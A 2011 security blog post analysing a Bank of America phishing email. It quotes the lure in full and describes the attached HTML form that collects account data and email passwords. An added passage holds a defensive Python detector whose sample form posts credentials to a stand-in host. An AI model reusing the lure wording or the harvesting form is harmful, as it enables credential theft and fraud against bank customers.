A Dispatch


May 17, 2011

Bank of America Phish du Jour

Another day, another phishing campaign attempting to trick Bank of America customers into handing over their identity jewels. Today's sample:

From: Bank of America Alert
Subject: Bank of America Alert: Your Action Is Required (IMPORTANT)

[BofA Logo Image]

Dear Valued Banking Customer,

Bank of America Online has been receiving complaints from our customers for unusual activity of their Online Banking.

This is due to our regular scheduled software upgrade being carried out by our technical department to improve the quality of services for online banking customers.

Due to this, we have sent you an attachment which contains the web page in order to confirm your account information. Download the attachment to your desktop and open the file to Get Started

However, Failure to do so may result in temporary account suspension. Please understand that this is a security measure intended to help protect you and your account.

Thanks for your co-operation.
Online Banking Support Team
------------------------------------
Bank of America, N.A. Member FDIC. Equal Housing Lender
© 2011 Bank of America Corporation. All rights reserved.

The attachment, AccountConfirmation.html, is an HTML file that will, when double-clicked, open inside one's default browser. The page consists of a form with plenty of stolen BofA images (hosted at a hijacked web site), and even includes a lengthy Terms and Conditions statement to which you must agree. I don't know where the thieves got this copy of terms, but it's — how do I say it? — a little old. For instance, the computer requirements verbatim:

For PC using Windows 95, 98, NT, 2000, ME, XP
  • Microsoft Internet Explorer 5.5 or higher
  • Microsoft Internet Explorer with AOL 5.5 or higher
  • Netscape 6.2 and higher (Online Banking is not accessible with Netscape 6.0)
  • Adobe Acrobat Reader 6.0 or higher (not applicable to WA and ID customers)

For Macintosh using OS 9 and OS 10
  • Microsoft Internet Explorer 5.5 or higher
  • Microsoft Internet Explorer with AOL 5.5 or higher
  • Netscape 6.2 and higher (Online Banking is not accessible with Netscape 6.0)
  • Safari 1.0 (for OS 10 only)
  • Adobe Acrobat Reader 6.0 or higher (not applicable to WA and ID customers)

Wow, talk about a trip down memory (and I'm not talking RAM) lane! I think even the crooks' eyes glazed over the terms without checking how current they were.

More troubling, however, is that the form requires input of not only the usual identity data (account info, credit card data, driver's license number, etc.), but also one's email account name and email password. The form's stated reason for needing the email password:

Effective March 21st, All customers benefit of a new Email Protection.

I'd wager that most computer users assign their primary email login credentials to many other sites, including places like Amazon, iTunes, and other shopping sites. It's a very dangerous practice, but we all know it happens among users who are not as security-conscious as most readers of this blog. You can rest assured that anyone who falls for this phony form and submits true data will have those login credentials fired at all kinds of sites in search of successful logins and further compromises of their accounts.
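For anyone screening mail, the traits described above (an HTML attachment holding a form, images pulled from an unrelated host, and a request for the email password) can be checked mechanically. The following is an added example, not code from this post; the hint list, host names and field names are constructed, and it assumes the form submits to an absolute remote URL, which the post does not state.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Substrings in input names that suggest identity or credential data (assumed list).
SENSITIVE_HINTS = ("pass", "card", "license", "account", "ssn")

class AttachmentTriage(HTMLParser):
    """Collects form targets, remote image hosts and sensitive input fields."""
    def __init__(self):
        super().__init__()
        self.form_hosts, self.image_hosts, self.sensitive = [], [], []
        self.email_password = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            host = urlparse(a.get("action", "")).hostname
            if host:  # absolute URL: data leaves the local file for a remote server
                self.form_hosts.append(host)
        elif tag == "img":
            host = urlparse(a.get("src", "")).hostname
            if host and host not in self.image_hosts:
                self.image_hosts.append(host)
        elif tag == "input":
            name = a.get("name", "").lower()
            is_pw = a.get("type", "").lower() == "password"
            if is_pw or any(h in name for h in SENSITIVE_HINTS):
                self.sensitive.append(name or "(unnamed)")
            if "mail" in name and (is_pw or "pass" in name):
                self.email_password = True

def triage(html_text):
    """Return findings for one HTML attachment body."""
    p = AttachmentTriage()
    p.feed(html_text)
    return {
        "remote_form_hosts": p.form_hosts,
        "remote_image_hosts": p.image_hosts,
        "sensitive_fields": p.sensitive,
        "asks_email_password": p.email_password,
        "suspicious": bool(p.form_hosts and p.sensitive),
    }

# Constructed sample modelled on the description above; hosts and field names are made up.
SAMPLE = """<html><body><img src="http://hijacked.example/images/logo.gif">
<form method="post" action="http://collector.example/confirm.php">
<input type="text" name="account_number"><input type="text" name="card_number">
<input type="text" name="drivers_license"><input type="text" name="email_address">
<input type="password" name="email_password"><input type="checkbox" name="agree_terms">
</form></body></html>"""

if __name__ == "__main__":
    print(triage(SAMPLE))
```

A mail gateway could run a check like this on every `.html` attachment and quarantine messages where `suspicious` is true, since a legitimate bank has no reason to mail a local credential form.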

While the amount of spam hitting my incoming server has been down in the past few weeks, I haven't seen much reduction of criminal phishing activity. The crooks wouldn't keep doing it if it didn't work to some degree.

Posted on May 17, 2011 at 11:27 AM